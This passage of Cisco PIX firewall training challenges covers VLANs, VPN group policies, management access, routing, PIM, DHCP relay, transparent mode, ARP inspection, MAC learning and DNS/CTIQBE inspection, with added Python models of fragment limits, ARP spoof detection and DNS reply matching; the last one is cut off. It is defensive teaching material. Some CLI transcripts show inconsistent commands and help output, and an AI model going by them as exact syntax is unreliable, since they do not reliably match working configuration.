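        if self.in_use() >= self.s.size:    # fragment size: database is full
            return "drop:size"
        fs = self.sets.get(frag.set_id)
        if fs is None:
            fs = FragmentSet(first_seen=frag.time)
            self.sets[frag.set_id] = fs
        if len(fs.frags) >= self.s.chain:   # fragment chain: this packet has too many pieces
            del self.sets[frag.set_id]
            self.dropped.append((frag.set_id, "chain"))
            return "drop:chain"
        fs.frags.append(frag)
        if fs.complete():
            del self.sets[frag.set_id]
            return "reassembled"
        return "queued"


def run(settings: FragmentSettings, frags: List[Fragment]) -> Tuple[List[str], List[Tuple[SetId, str]]]:
    """Feed constructed fragments through a fresh database; returns (verdicts, dropped sets)."""
    db = FragmentDB(settings)
    verdicts = [db.accept(f) for f in frags]
    return verdicts, db.dropped


# Constructed traffic. 1480-byte fragments sit at offsets that are multiples of 185 (x8 bytes).
ID1: SetId = ("10.0.0.5", "10.0.0.9", 1)
ID2: SetId = ("10.0.0.5", "10.0.0.9", 2)
ID3: SetId = ("10.0.0.7", "10.0.0.9", 3)
TWO_PIECES = [Fragment(ID1, 0, 1480, True, 0.0), Fragment(ID1, 185, 100, False, 0.1)]
LONG_CHAIN = [Fragment(ID2, i * 185, 1480, True, 1.0 + i / 10) for i in range(8)]
NEVER_DONE = [Fragment(ID3, 0, 1480, True, 2.0)]

if __name__ == "__main__":
    print(run(FragmentSettings(), TWO_PIECES)[0])               # ['queued', 'reassembled']
    print(run(FragmentSettings(chain=4), LONG_CHAIN[:5])[0])    # 4 x 'queued', then 'drop:chain'
    print(run(FragmentSettings(timeout=5.0), NEVER_DONE + [Fragment(ID1, 0, 1480, True, 8.0)]))
```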

Cisco PIX Challenge 71


Outline
This challenge involves defining a VLAN on a subinterface. A VLAN is assigned to a
subinterface, not to the physical interface itself.
Objectives
The objectives of this challenge are to:

Define a VLAN on a sub-interface.
Enable the sub-interface.

Example
pixfirewall(config)# int e0.1
pixfirewall(config-subif)# ?
Interface configuration commands:
default
Set a command to its defaults
description
Interface specific description
exit
Exit from interface configuration mode
help
Interactive help for interface subcommands
igmp
IGMP interface commands
ip
Configure ip addresses.
ipv6
IPv6 interface subcommands
management-only Dedicate an interface to management. Block thru traffic
nameif
Assign name to interface
no
Negate a command or set its defaults
ospf
Configure interface specific OSPF parameters
pim
PIM interface commands
security-level
Specify the security level of this interface after this
keyword, Eg: 0, 100 etc. The relative security level between
two interfaces determines the way the Adaptive Security
Algorithm is applied. A lower security_level interface is
outside relative to a higher level interface and equivalent
interfaces are outside to each other
shutdown
Shutdown the selected interface
vlan
Configure VLAN identifier
pixfirewall(config-subif)# vl ?
subinterface mode commands/options:
<1-4094> IEEE 802.1Q VLAN Identifier
pixfirewall(config-subif)# vlan 2
pixfirewall(config-subif)# no shutdown
pixfirewall(config-subif)# exit
pixfirewall(config)# int e1.1
pixfirewall(config-subif)# vlan 2
pixfirewall(config-subif)# no shutdown
pixfirewall(config-subif)# exit
pixfirewall(config)# int e2.1
pixfirewall(config-subif)# vlan 2
pixfirewall(config-subif)# no shutdown
pixfirewall(config-subif)# exit

Cisco PIX Challenge 72


Outline
This challenge involves defining the attributes for the group-policy.
Objectives
The objectives of this challenge are to:

Define a group-policy attribute.
Define attributes.
Define a tunnel-group.
Define IPSec attributes.

Example
pixfirewall(config)# group-policy ?
configure mode commands/options:
WORD < 65 char Enter the name of the group policy
pixfirewall(config)# group-policy test ?
configure mode commands/options:
attributes Enter the attributes sub-command mode
external
Enter this keyword to specify an external group policy
internal
Enter this keyword to specify an internal group policy
pixfirewall(config)# group-policy test attributes
pixfirewall(config-group-policy)# ?
group_policy configuration commands:
backup-servers
Configure list of backup servers to be used
by the remote client
banner
Configure a banner, or welcome text to be
displayed on the VPN remote client
client-access-rule
Specify rules permitting/denying access to
specific client types and versions.
client-firewall
Configure the firewall requirements for
users in this group-policy
default-domain
Configure default domain name given to
users of this group
dhcp-network-scope
Specify the range of IP addresses to
indicate to the DHCP server for address
assignment
dns-server
Configure the primary and secondary DNS
servers
exit
Exit from group-policy configuration mode
group-lock
Enter name of an existing tunnel-group that
users are required to connect with
help
Help for group_policy configuration
commands
ip-comp
Enter this command to enable IP
compression(LZS)
ip-phone-bypass
Configure to allow Cisco IP phones behind
Hardware clients to bypass the Individual
User Authentication process.
ipsec-udp
Enter this command to allow a client to
operate through a NAT device using UDP
encapsulation
ipsec-udp-port
Enter the UDP port to be used by the client
for IPSec through NAT
leap-bypass
Enable/disable LEAP packets from Cisco
wireless devices to bypass the individual
user authentication process. This setting
applies only to HW clients.
nem
Configure hardware clients to use network
extension mode. This setting applies only
to HW clients.
no
Remove an attribute value pair
password-storage
Enable/disable storage of the login
password on the client system
pfs
Enter this command to indicate that the
remote client needs to perform PFS
re-xauth
Enter this command to enable
reauthentication of the user on IKE rekey
secure-unit-authentication
Configure interactive authentication. This
setting applies only to HW clients.
split-dns
Configure list of domains to be resolved
through the Split Tunnel
split-tunnel-network-list
Configure name of access-list for split
tunnel configuration
split-tunnel-policy
Select the split tunneling method to be
used by the remote client
user-authentication
Configure individual user authentication.
This setting applies only to HW clients.
user-authentication-idle-timeout Configure the idle timeout period in
minutes. If there is no communication in
this period, the system terminates the
connection. This setting applies only to HW
clients.
vpn-access-hours
Enter name of a configured time-range
policy
vpn-filter
Enter name of a configured ACL to apply to
users
vpn-idle-timeout
Enter idle timeout period in minutes, enter
none to disable
vpn-session-timeout
Enter maximum user connection time in
minutes, enter none for unlimited time
vpn-simultaneous-logins
Enter maximum number of simultaneous logins
allowed
vpn-tunnel-protocol
Enter permitted tunneling protocols
wins-server
Configure the primary and secondary WINS
servers
pixfirewall(config-group-policy)# banner ?
group-policy mode commands/options:
none
Specify that no banner text will be displayed on the VPN remote client
value Specify the banner or welcome text to be displayed on the VPN remote
client
pixfirewall(config-group-policy)# banner none
pixfirewall(config-group-policy)# vpn-simultaneous-logins ?
group-policy mode commands/options:
<0-2147483647> Maximum number of simultaneous logins allowed, enter 0 to
disable login and prevent user access
pixfirewall(config-group-policy)# vpn-simultaneous-logins 10
pixfirewall(config-group-policy)# vpn-idle ?
group-policy mode commands/options:
<1-35791394> Number of minutes
none
Disable timeout and allow an unlimited idle period
pixfirewall(config-group-policy)# vpn-idle 10
pixfirewall(config-group-policy)# vpn-tunnel ?
group-policy mode commands/options:
IPSec IP Security Protocol
pixfirewall(config-group-policy)# vpn-tunnel ipsec
pixfirewall(config-group-policy)# wins-server ?
group-policy mode commands/options:
none
No wins-server will be specified and disable inheritance
value Specify the primary and secondary WINS servers
pixfirewall(config-group-policy)# wins-server 10
pixfirewall(config-group-policy)# dhcp-server ?
group-policy mode commands/options:
A.B.C.D The IP sub-network that the DHCP server should assign to users in
this group
none
No range of IP addresses will be specified and disable inheritance
pixfirewall(config-group-policy)# dhcp-server 10
pixfirewall(config-group-policy)# exit
pixfirewall(config)# exit
pixfirewall# sh running
pixfirewall# config t
pixfirewall(config)# tunnel-group test type ?
configure mode commands/options:
ipsec-l2l IPSec Site to Site group
ipsec-ra
IPSec Remote Access group
pixfirewall(config)# tunnel-group test type ipsec-ra
pixfirewall(config)# tunnel-group test ?
configure mode commands/options:
general-attributes Enter the general-attributes sub command mode
ipsec-attributes
Enter the ipsec-attributes sub command mode
type
Enter the type of this group-policy
pixfirewall(config)# tunnel-group test general-attributes
pixfirewall(config-general)# ?
group_policy configuration commands:
accounting-server-group
Enter name of the accounting server group
address-pool
Enter a list of address pools to assign
addresses from
authentication-server-group Enter name of the authentication server group
authorization-server-group
Enter name of the authorization server group
default-group-policy
Enter name of the default group policy
dhcp-server
Enter IP address or name of the DHCP server
exit
Exit from tunnel-group general attribute
configuration mode
help
Help for tunnel group configuration commands
no
Remove an attribute value pair
strip-group
Enable strip-group processing
strip-realm
Enable strip-realm processing
pixfirewall(config-general)# exit
pixfirewall(config)# tunnel-g test ?
configure mode commands/options:
general-attributes Enter the general-attributes sub command mode
ipsec-attributes
Enter the ipsec-attributes sub command mode
type
Enter the type of this group-policy
pixfirewall(config)# tunnel-group test ipsec-attributes
pixfirewall(config-ipsec)# ?
group_policy configuration commands:
authorization-dn-attributes The DN of the peer certificate used as username
for authorization
authorization-required
Require users to authorize successfully in order
to connect
chain
Enable sending certificate chain
client-update
Configure and change client update parameters
exit
Exit from tunnel-group IPSec attribute
configuration mode
help
Help for tunnel group configuration commands
isakmp
Configure ISAKMP policy
no
Remove an attribute value pair
peer-id-validate
Validate identity of the peer using the peer's
certificate
pre-shared-key
Associate a pre-shared key with the connection
policy
radius-with-expiry
Enable negotiation of password update during
RADIUS authentication
trust-point
Enter name of the trustpoint that identifies the
certificate to be sent to the IKE peer

Cisco PIX Challenge 73


Outline
This challenge involves defining that each of the ports has the same security level, so that all
the ports can communicate with each other. Also the test recaps TELNET, SSH and HTTP
details.
Objectives
The objectives of this challenge are to:

Define the details of the ports.
Apply the same security level.
Generate RSA keys.
Define TELNET, SSH and HTTP details.

Example
# config t
(config)# int e0
(config-if)# ip address outside 192.168.1.1 255.255.255.0
(config-if)# nameif ?
interface mode commands/options:
WORD < 49 char A name by which this interface will be referred in all other
Commands
(config-if)# nameif out
(config-if)# security ?
interface mode commands/options:
<0-100> Security level for the interface
(config-if)# security 0
(config-if)# no shutdown
(config-if)# exit
(config)# int e1
(config-if)# ip address outside 192.168.2.1 255.255.255.0
(config-if)# nameif in
(config-if)# no shutdown
(config-if)# exit
(config)# same-security-traffic ?
configure mode commands/options:
permit Keyword for enabling this functionality
(config)# same-security-traffic permit ?
configure mode commands/options:
inter-interface Permit communication between different interfaces with the
same security level
intra-interface Permit communication between VPN peers connected to the same
interface
(config)# same-security-traffic permit inter-interface
(config)# cry key ?
configure mode commands/options:
generate Generate new keys
zeroize
Remove keys
(config)# crypto key generate ?
configure mode commands/options:
dsa Generate DSA keys
rsa Generate RSA keys
(config)# crypto key generate rsa ?
configure mode commands/options:
general-keys Generate a general purpose RSA key pair for signing and
encryption
label
Provide a label
modulus
Provide number of modulus bits on the command line
noconfirm
Specify this keyword to suppress all interactive prompting.
usage-keys
Generate seperate RSA key pairs for signing and encryption
<cr>
(config)# crypto key generate rsa modulus ?
configure mode commands/options:
1024 1024 bits
2048 2048 bits
512
512 bits
768
768 bits
(config)# crypto key generate rsa modulus 1024
(config)# telnet 204.134.17.7 255.255.192.0 inside
(config)# telnet 201.13.14.2 255.255.240.0 outside
(config)# telnet 210.1.170.5 255.255.224.0 inf2
(config)# telnet timeout 10
(config)# show telnet
(config)# show telnet timeout
(config)# ssh 204.134.17.7 255.255.192.0 inside
(config)# ssh timeout 10
(config)# http server enable
(config)# http 204.134.17.7 255.255.192.0 inside
(config)# http 201.13.14.2 255.255.240.0 outside

Cisco PIX Challenge 74


Outline
This challenge involves defining the default route for both tunneled and non-tunneled traffic.
Objectives
The objectives of this challenge are to:

Define interface details.
Define default routes.

Example
# config t
(config)# int e0
(config-if)# ip address outside 192.168.1.1 255.255.255.0
(config-if)# nameif ?
interface mode commands/options:
WORD < 49 char A name by which this interface will be referred in all other
Commands
(config-if)# nameif edinburgh
(config-if)# exit
(config)# exit
(config)# route ?
configure mode commands/options:
Current available interface(s):
Inf2 Name of interface Ethernet2
Inside
Name of interface Ethernet1
Edinburgh Name of interface Ethernet0
(config)# route Edinburgh ?
configure mode commands/options:
Hostname or A.B.C.D The foreign network for this route, 0 means default
(config)# route Edinburgh 0 ?
configure mode commands/options:
A.B.C.D The netmask for the destined foreign network
(config)# route Edinburgh 0 0 ?
configure mode commands/options:
Hostname or A.B.C.D The address of the gateway by which the foreign network
is reached.
(config)# route Edinburgh 0 0 192.168.0.2
(config)# route Edinburgh 0 0 192.168.0.3 ?
configure mode commands/options:
<1-255>
Distance metric for this route, default is 1
tunneled Enable the default tunnel gateway option, metric is set
to 255
<cr>
(config)# route Edinburgh 0 0 192.168.0.3 tunneled

Cisco PIX Challenge 75


Outline
This challenge involves defining PIM to maintain forwarding tables for forwarding
multicast datagrams.
Objectives
The objectives of this challenge are to:

Define interface details.
Define PIM details.

Example
# config t
(config)# int e0
(config-if)# ip address outside 192.168.1.1 255.255.255.0
(config-if)# nameif ?
interface mode commands/options:
WORD < 49 char A name by which this interface will be referred in all other
Commands
(config-if)# nameif Edinburgh
(config-if)# pim ?
interface mode commands/options:
dr-priority
PIM Hello DR priority
hello-interval
PIM neighbor Hello announcement interval
join-prune-interval PIM periodic Join-Prune announcement interval
<cr>
configure mode commands/options:
accept-register
Register accept filter
old-register-checksum Generate registers compatible with older IOS versions
rp-address
Configure Sparse-Mode Rendezvous Point
spt-threshold
Configure threshold for SPT switchover on last-hop
(config-if)# pim
(config-if)# pim dr-priority ?
interface mode commands/options:
<0-4294967295> Hello DR priority, preference given to larger value
(config-if)# pim dr-priority 50
(config-if)# pim hello-interval ?
interface mode commands/options:
<1-3600> Hello interval in seconds
(config-if)# pim hello-interval 50
(config-if)# pi join-prune-interval ?
interface mode commands/options:
<10-600> Join-Prune interval in seconds
(config-if)# pi join-prune-interval 50
(config-if)# exit
(config)# pim ?
configure mode commands/options:
accept-register
Register accept filter
old-register-checksum Generate registers compatible with older IOS versions
rp-address
Configure Sparse-Mode Rendezvous Point
spt-threshold
Configure threshold for SPT switchover on last-hop
(config)# pim accept-register ?
configure mode commands/options:
list
Access list
route-map Route-map
(config)# pim old-register-checksum ?
configure mode commands/options:
<cr>
exec mode commands/options:
Hostname or A.B.C.D
Ping destination IPv4 address or hostname
Hostname or X:X:X:X::X Ping destination IPv6 address or hostname
<cr>
(config)# pim rp-address ?
configure mode commands/options:
Hostname or A.B.C.D IP name or address of Rendezvous Point
(config)# pim rp-address 192.168.0.1
(config)# pim spt-threshold ?
configure mode commands/options:
infinity Always stay on shared-tree

Cisco PIX Challenge 76


Outline
This challenge involves defining DHCP relay, where DHCP requests can be forwarded to a
certain interface.
Objectives
The objectives of this challenge are to:

Define interface details.
Define DHCP relay details.

Example
# config t
(config)# int e0
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# nameif Edinburgh
(config-if)# exit
(config)# dhcprelay ?
configure mode commands/options:
enable
Start a DHCP server task on an interface, but at least one
dhcpdrelay server must be configured before enable is issued
server
Configure dhcprelay server information
setroute
Configure the DHCP Relay Agent to change the first default
router address (in the packet sent from the DHCP server) to
the address of the client interface
timeout
Configure timeout, the number of seconds for relay address
negotiation after this keyword
(config)# dhcprelay server ?
configure mode commands/options:
Hostname or A.B.C.D IP address of dhcprelay server to which
requests are forwarded
(config)# dhcprelay server 192.168.1.2
(config)# dhcprelay setroute ?
configure mode commands/options:
Available client interface names:
Inf2
Name of interface Ethernet2
Inside
Name of interface Ethernet1
Edinburgh Name of interface Ethernet0
(config)# dhcprelay enable ?
configure mode commands/options:
Available interfaces on which relay agent will accept client requests:
Inf2       Name of interface Ethernet2
Inside     Name of interface Ethernet1
Edinburgh  Name of interface Ethernet0
(config)# dhcprelay enable Edinburgh
(config)# dhcprelay timeout ?
configure mode commands/options:
<1-3600> Enter number of seconds for relay address negotiation, default
is 60 seconds
<cr>
(config)# dhcprelay timeout 10

Cisco PIX Challenge 77


Outline
This challenge involves switching the firewall to transparent (bridging) mode and
enabling EtherType access filtering. An EtherType access list only governs non-IP
frames (IP and ARP are still handled by the normal extended access lists), and it
only applies in transparent mode. Note that denying BPDUs, as the example does on
both interfaces, stops spanning tree from seeing through the firewall; if the
firewall bridges two switches in a redundant topology this can create a loop, so
only deny bpdu where the topology has been checked.
Objectives
The objectives of this challenge are to:

Define a transparent firewall.


Define EtherType filtering.

Example
# config t
pixfirewall(config)# firewall ?
configure mode commands/options:
transparent Switch to transparent mode
(config)# firewall transparent
Switched to transparent mode
(config)# access-list ?
configure mode commands/options:
WORD < 241 char Access list identifier
alert-interval
Specify the alert interval for generating syslog message
106001 which alerts that the system has reached a deny
flow maximum. If not specified, the default value is 300 sec
deny-flow-max
Specify the maximum number of concurrent deny flows that can
be created. If not specified, the default value is 4096
(config)# access-list TEST ?
configure mode commands/options:
deny       Specify packets to reject
ethertype  Configure access policy for non IP traffic through the
           system when configured in transparent mode
extended   Configure access policy for IP traffic through the system
line       Use this to specify line number at which ACE should be entered
permit     Specify packets to forward
remark     Specify a comment (remark) for the access-list after this
           keyword
standard   Use this to configure policy having destination host or network
           only
(config)# access-list TEST ethertype ?
configure mode commands/options:
deny    Specify packets to reject
permit  Specify packets to forward
(config)# access-list TEST ethertype deny ?
configure mode commands/options:
bpdu
ipx
mpls-unicast
mpls-multicast
any
<0x600-0xffff> Specify ethertype value
(config)# access-list TEST ethertype deny ipx
(config)# access-list TEST ethertype deny bpdu
pixfirewall(config)# access-group TEST ?
configure mode commands/options:
in
For input traffic
out For output traffic
pixfirewall(config)# access-group TEST in ?
configure mode commands/options:
interface Keyword to specify an interface
pixfirewall(config)# access-group TEST in interface ?
configure mode commands/options:
Current available interface(s):
Inf2     Name of interface Ethernet2
inside   Name of interface Ethernet1
outside  Name of interface Ethernet0
(config)# access-group TEST in interface outside
(config)# access-group TEST in interface inside

Cisco PIX Challenge 78


Outline
This challenge involves automated updates for the firewall, and enabling ARP inspection.
ARP inspection helps to defeat ARP spoofing, where an intruder answers a request for
the gateway address with their own MAC address, so that hosts on the segment send their
traffic through the intruder's system. This is a man-in-the-middle attack: the intruder
can read or alter the data before passing it on to the real gateway. For ARP inspection
to work the firewall must hold a static ARP entry for each host on the network, since it
compares the sender MAC address, IP address and arrival interface of every ARP packet
against that table and drops packets that contradict an entry.
NOTE: A transparent firewall does not route data, and thus does not have IP addresses on its
ports. It can have one IP address, but this is used only for management purposes.
NOTE: The auto-update server URL in the example carries a username and password over
plain http, so they cross the network in cleartext. In practice use an https URL, where
the verify-certificate option shown below can also be applied.
Objectives
The objectives of this challenge are to:

Define auto-update parameters.


Define an static ARP entry.
Enable ARP inspection.

Example
# config t
pixfirewall(config)# auto-update ?
configure mode commands/options:
device-id    Specify the device ID reported to the Auto Update Server
poll-period  Specify how often to poll the Auto Update Server
server       Specify the URL of the Auto Update Server
timeout      Specify maximum wait to contact the Auto Update Server
pixfirewall(config)# auto-update device-id ?
configure mode commands/options:
hardware-serial  Hardware serial number
hostname         Host name
ipaddress        IP address of the specified interface
mac-address      MAC address of the specified interface
string           Text string
pixfirewall(config)# auto-update device-id hostname
pixfirewall(config)# auto-update poll-period ?
configure mode commands/options:
<1-35791> Period in minutes between poll updates
pixfirewall(config)# auto-update poll-period 10
pixfirewall(config)# auto-update server ?
configure mode commands/options:
WORD < 450 char URL of the auto update server
pixfirewall(config)# auto-update server http://user:password@1.2.3.4:8080/update ?
configure mode commands/options:
verify-certificate Verify the Auto Update Server certificate
<cr>
pixfirewall(config)# auto-update server http://user:password@1.2.3.4:8080/update
pixfirewall(config)# auto-update timeout ?
configure mode commands/options:
<1-35791> Timeout in minutes to contact server
pixfirewall(config)# auto-update timeout 10
pixfirewall(config)# firewall transparent
pixfirewall(config)# ip address 1.2.3.4 255.255.255.0
pixfirewall(config)# arp-inspection ?
configure mode commands/options:
Current available interface(s):
Inf2     Name of interface Ethernet2
Inside   Name of interface Ethernet1
Outside  Name of interface Ethernet0
pixfirewall(config)# arp-inspection outside ?
configure mode commands/options:
enable Enable arp inspection
pixfirewall(config)# arp-inspection outside enable ?
configure mode commands/options:
flood
Flood arp requests
no-flood Do not flood arp requests
<cr>
pixfirewall(config)# arp-inspection outside enable no-flood
pixfirewall(config)# arp ?
configure mode commands/options:
timeout  Configure ARP timeout value
Current available interface(s):
inside   Name of interface Ethernet1
outside  Name of interface Ethernet0
pixfirewall(config)# arp inside ?
configure mode commands/options:
Hostname or A.B.C.D IP address for an ARP table entry
pixfirewall(config)# arp inside 1.2.3.4 ?
configure mode commands/options:
H.H.H Hardware MAC address
pixfirewall(config)# arp inside 1.2.3.4 1.1.1 ?
configure mode commands/options:
alias Don't expire this ARP entry after timeout
<cr>

pixfirewall(config)# mac-address-table ?
configure mode commands/options:
aging-time  Configure duration that a bridge entry will remain in the table,
            default is 5 minutes
static      Add static entries to the table
pixfirewall(config)# mac-address-table aging-time ?
configure mode commands/options:
<5-720> Aging interval in minutes
pixfirewall(config)# mac-address-table aging-time 10
pixfirewall(config)# mac-address-table static ?
configure mode commands/options:
Current available interface(s):
Inf2     Name of interface Ethernet2
Inside   Name of interface Ethernet1
Outside  Name of interface Ethernet0
pixfirewall(config)# mac-address-table static inside ?
configure mode commands/options:
H.H.H MAC address
pixfirewall(config)# mac-address-table static inside 1.1.1 ?
configure mode commands/options:
<cr>
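The decision that arp-inspection makes for each ARP packet, written out as an added Python model (example code, not part of the original challenge or of the PIX software). The static table and the interface modes mirror the arp and arp-inspection commands above; the packet contents and the flood mode on the inside interface are assumptions made for the example.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpPacket:
    """One ARP request or reply as seen by the firewall (constructed for the example)."""
    interface: str      # interface the packet arrived on
    sender_ip: str
    sender_mac: str     # H.H.H form, as used by the PIX 'arp' command
    is_reply: bool = True


class ArpInspector:
    """Hypothetical model of 'arp-inspection <if> enable [flood|no-flood]'.

    Static entries come from 'arp <if> <ip> <mac>'. Every ARP packet on an
    inspected interface is compared against the static table:
      * sender MAC, IP and interface all match an entry   -> forwarded
      * an entry exists for the IP but MAC or interface differ -> dropped (spoof)
      * no entry for the IP -> flooded to all interfaces (flood, the default)
        or dropped (no-flood)
    """

    def __init__(self):
        self.static = {}    # ip -> (interface, mac)
        self.mode = {}      # interface -> True (flood) / False (no-flood)

    def add_static(self, interface, ip, mac):
        self.static[ip] = (interface, mac.lower())

    def enable(self, interface, flood=True):
        self.mode[interface] = flood

    def check(self, pkt):
        """Return (verdict, reason); verdict is 'forward', 'flood' or 'drop'."""
        if pkt.interface not in self.mode:
            return "forward", "arp-inspection not enabled on %s" % pkt.interface
        entry = self.static.get(pkt.sender_ip)
        if entry is None:
            if self.mode[pkt.interface]:
                return "flood", "no static entry for %s; flood mode" % pkt.sender_ip
            return "drop", "no static entry for %s; no-flood mode" % pkt.sender_ip
        if entry == (pkt.interface, pkt.sender_mac.lower()):
            return "forward", "matches static entry"
        return "drop", "MAC or interface mismatch for %s (possible ARP spoof)" % pkt.sender_ip


def demo():
    """Replay constructed packets against the configuration from the challenge."""
    fw = ArpInspector()
    fw.add_static("inside", "1.2.3.4", "1.1.1")        # arp inside 1.2.3.4 1.1.1
    fw.enable("outside", flood=False)                  # arp-inspection outside enable no-flood
    fw.enable("inside", flood=True)                    # assumed for the example
    packets = [
        ArpPacket("inside", "1.2.3.4", "1.1.1"),            # legitimate host
        ArpPacket("inside", "1.2.3.4", "dead.beef.0001"),   # attacker claiming 1.2.3.4
        ArpPacket("outside", "1.2.3.4", "1.1.1"),           # right MAC, wrong interface
        ArpPacket("outside", "9.9.9.9", "0000.0c07.ac01"),  # unknown host, no-flood interface
        ArpPacket("inside", "1.2.3.9", "0000.0c07.ac02"),   # unknown host, flood interface
    ]
    return [fw.check(p)[0] for p in packets]


if __name__ == "__main__":
    print(demo())   # ['forward', 'drop', 'drop', 'drop', 'flood']
```

The third packet is the case that static entries alone do not catch: the MAC is correct, but the claim arrives on the wrong side of the firewall, so the inspector treats it as a spoof.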

Cisco PIX Challenge 79


Outline
In transparent mode the firewall keeps a table of the MAC addresses learned on each of its
interfaces and uses it to bridge frames out of the correct interface. To guard against
MAC address spoofing, automatic learning of MAC addresses can be switched off on an
interface, and the MAC addresses of all valid nodes added statically, so that only
administratively defined entries are present in the table.
NOTE: A transparent firewall does not route data, and thus does not have IP addresses on its
ports. It can have one IP address, but this is used only for management purposes.
Objectives
The objectives of this challenge are to:

Define MAC addresses of the MAC address table.


Disable MAC address learning.

Example

# config t
pixfirewall(config)# firewall transparent
pixfirewall(config)# ip address 1.2.3.4 255.255.255.0
pixfirewall(config)# mac-address-table ?
configure mode commands/options:
aging-time  Configure duration that a bridge entry will remain in the table,
            default is 5 minutes
static      Add static entries to the table
pixfirewall(config)# mac-address-table a ?
configure mode commands/options:
<5-720> Aging interval in minutes
pixfirewall(config)# mac-address-table static ?
configure mode commands/options:
Current available interface(s):
Inf2     Name of interface Ethernet2
Inside   Name of interface Ethernet1
Outside  Name of interface Ethernet0
pixfirewall(config)# mac-address-table static outside ?
configure mode commands/options:
H.H.H MAC address
pixfirewall(config)# mac-address-table static outside 1.1.1
pixfirewall(config)# mac-learn ?
configure mode commands/options:
Current available interface(s):
Inf2     Name of interface Ethernet2
Inside   Name of interface Ethernet1
Outside  Name of interface Ethernet0
pixfirewall(config)# mac-learn outside ?
configure mode commands/options:
disable Disable mac learning on the interface
pixfirewall(config)# mac-learn outside disable

Cisco PIX Challenge 80


Outline
Some application protocols negotiate additional connections on dynamically chosen ports
as part of their operation. The firewall must inspect the control channel to learn these
ports and open them, otherwise the protocol does not work through it.
CTIQBE inspection supports the Cisco IP SoftPhone and other Cisco TAPI/JTAPI applications
that register with Cisco CallManager. These are used in many Voice-over-IP deployments.

Objectives
The objectives of this challenge are to:

Define interesting CTIQBE traffic.


Define a policy map.
Define CTIQBE inspection.
Apply the policy map.

Example
# config t
pixfirewall(config)# class-map ctest
pixfirewall(config-cmap)# match port tcp eq ?
mpf-class-map mode commands/options:
<0-65535>  Enter port number (0 - 65535)
aol
bgp
chargen
cifs
citrix-ica
cmd
ctiqbe
daytime
discard
domain
echo
exec
finger
ftp
ftp-data
gopher
h323
hostname
http
https
ident
imap4
irc
kerberos
klogin
kshell
ldap
ldaps
login
lotusnotes
lpd
netbios-ssn
nntp
pcanywhere-data
pim-auto-rp
pop2
pop3
pptp
rsh
rtsp
sip

smtp
sqlnet
ssh
sunrpc
tacacs
talk
telnet
uucp
whois
www
pixfirewall(config-cmap)# match port tcp eq 2748
pixfirewall(config-cmap)# exit
pixfirewall(config)# policy-map ptest
pixfirewall(config-pmap)# class ctest
pixfirewall(config-pmap-c)# inspect ?
mpf-policy-map-class mode commands/options:
ctiqbe
dns
esmtp
ftp
gtp
h323
http
icmp
ils
mgcp
netbios
pptp
rsh
rtsp
sip
skinny
snmp
sqlnet
sunrpc
tftp
xdmcp
pixfirewall(config-pmap-c)# inspect ctiqbe
pixfirewall(config-pmap-c)# exit
pixfirewall(config-pmap)# exit
pixfirewall(config)# service-policy ptest interface outside

Cisco PIX Challenge 81


Outline
DNS inspection checks that each DNS reply matches an outstanding query (by transaction ID)
and tears down the UDP connection as soon as the first matching reply has been received,
so that spoofed, stale or surplus replies are dropped rather than delivered. It can also
enforce a maximum DNS message length. This guards against reflected DNS attacks, where an
attacker sends many requests to a DNS server with the return address forged to be that of
the machine under attack; the victim then receives a flood of DNS replies it never asked
for, and servicing them degrades its performance.
Objectives

The objectives of this challenge are to:

Define interesting DNS traffic (UDP port 53).


Define a policy map.
Define DNS inspection.
Apply the policy map.

Example
# config t
pixfirewall(config)# class-map ctest
pixfirewall(config-cmap)# match port udp eq 53
pixfirewall(config-cmap)# exit
pixfirewall(config)# policy-map ptest
pixfirewall(config-pmap)# class ctest
pixfirewall(config-pmap-c)# inspect dns ?
mpf-policy-map-class mode commands/options:
maximum-length Maximum DNS packet length
<cr>
pixfirewall(config-pmap-c)# inspect dns max-length ?
mpf-policy-map-class mode commands/options:
<512-65535> Enter maximum DNS packet length
pixfirewall(config-pmap-c)# inspect dns max 1500
pixfirewall(config-pmap-c)# exit
pixfirewall(config-pmap)# exit
pixfirewall(config)# service-policy ptest interface outside
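The two checks described in the outline, the query/reply transaction ID match and the maximum-length limit, as an added Python model (example code, not part of the original challenge and not the PIX implementation). The DNS messages are constructed inline; the client address used as the connection key and the exact drop reasons are assumptions made for the example.

```python
import struct


def build_dns_message(txid, qname, answer_ip=None):
    """Construct a minimal DNS query (answer_ip=None) or A-record reply.
    Sample data for the example, not captured traffic."""
    flags = 0x8180 if answer_ip else 0x0100          # QR+RD+RA for a reply, RD for a query
    msg = struct.pack("!HHHHHH", txid, flags, 1, 1 if answer_ip else 0, 0, 0)
    for label in qname.strip(".").split("."):
        msg += bytes([len(label)]) + label.encode("ascii")
    msg += b"\x00" + struct.pack("!HH", 1, 1)          # QTYPE A, QCLASS IN
    if answer_ip:
        msg += b"\xc0\x0c"                              # compression pointer to the question name
        msg += struct.pack("!HHIH", 1, 1, 300, 4)       # TYPE A, CLASS IN, TTL, RDLENGTH
        msg += bytes(int(o) for o in answer_ip.split("."))
    return msg


def parse_dns_header(msg):
    """Return (txid, is_response) or None if the 12-byte header is incomplete."""
    if len(msg) < 12:
        return None
    txid, flags = struct.unpack("!HH", msg[:4])
    return txid, bool(flags & 0x8000)                   # QR bit


class DnsGuard:
    """Hypothetical model of 'inspect dns maximum-length N'.

    A reply is forwarded only if its transaction ID matches a query that the
    same client sent earlier and that has not been answered yet; the entry is
    removed on the first matching reply (the UDP connection is closed), so
    later replies for the same ID are dropped. Oversized messages are dropped.
    """

    def __init__(self, max_length=512):
        self.max_length = max_length
        self.outstanding = set()    # (client, txid) of queries awaiting a reply

    def inspect(self, client, msg, from_client):
        hdr = parse_dns_header(msg)
        if hdr is None:
            return "drop", "truncated DNS header"
        if len(msg) > self.max_length:
            return "drop", "message exceeds maximum-length %d" % self.max_length
        txid, is_response = hdr
        key = (client, txid)
        if from_client:
            if is_response:
                return "drop", "response flag set on a packet from the client"
            self.outstanding.add(key)
            return "forward", "query %04x recorded" % txid
        if not is_response:
            return "drop", "server-side packet is not a response"
        if key not in self.outstanding:
            return "drop", "reply %04x matches no outstanding query (spoofed or stale)" % txid
        self.outstanding.discard(key)                   # DNS guard: close after first reply
        return "forward", "reply %04x matched; UDP connection closed" % txid


def demo():
    """One legitimate exchange, then a forged reply, a duplicate reply and an oversized one."""
    guard = DnsGuard(max_length=1500)                   # inspect dns maximum-length 1500
    client = "10.0.0.5"                                 # assumed client address
    query = build_dns_message(0x1234, "www.example.com")
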